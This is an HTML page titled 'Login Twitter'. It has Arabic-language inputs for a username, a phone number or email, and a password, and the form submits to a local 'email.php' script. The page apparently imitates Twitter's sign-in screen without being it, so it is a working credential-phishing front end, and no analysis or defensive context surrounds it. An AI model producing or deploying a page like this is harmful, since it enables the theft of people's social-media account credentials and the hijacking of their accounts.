<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Twitter</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">

<style> 

body{
background:url(https://j.top4top.io/p_25812mzhd0.jpg);
background-size: 430px;
background-repeat;
}
.sub
{
  width: 300px;
  height: 50px;
  border: 1px solid;
  background: black;
  border-radius: 25px;
  font-size: 18px;
  color: #e9f4fb;
  font-weight: 700;
  cursor: pointer;
  outline: none;
}
.subb{
  width: 300px;
  height: 50px;
  border: 1px solid;
  background: white;
  border-radius: 25px;
  font-size: 18px;
  font-color:black;
  color: #black;
  font-weight: 700;
  cursor: pointer;
  outline: none;
}
.pas {
  width: 300px;
  height: 50px;
  border: 2px solid;
  border-radius: 14px;
  color: #black;
  cursor: pointer;
  font-size: 15px;

}

.tex {
  width: 300px;
  height: 50px;
  border: 2px solid;
  border-radius: 14px;
  color: #black;
  cursor: pointer;
  font-size: 15px;
}

.ema {
  width: 300px;
  height: 50px;
  border: 2px solid;
  border-radius: 14px;
  color: #black;
  cursor: pointer;
  font-size: 15px;

}



</style>
</head>
<body>
<center>

<div>
</br></br></br></br></br></br></br></br></br></br></br></br>
  <h3 style="color: white;">Login Twitter</h3></br>
    <form dir="rtl" action="email.php" autocomplete="off" method="post">
        <input class="tex" type="text" name="text" id="text"
        placeholder="@اسم المستخدم" required="" /></br></br>
        <input class="ema" type="text" name="email" id="email"
        placeholder="رقم الهاتف المحمول او عنوان البريد الالكتروني" required="" /></br></br>
        <input class="pas" type="password" name="password" id="password"
        placeholder="كلمة السر" required="" /></br></br>
        <button class="sub">تسجيل </button>
        </form></br>
        <button class="subb">نسيت كلمة السر </button>
               
</div>
</center>



<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script>
</body>
</html>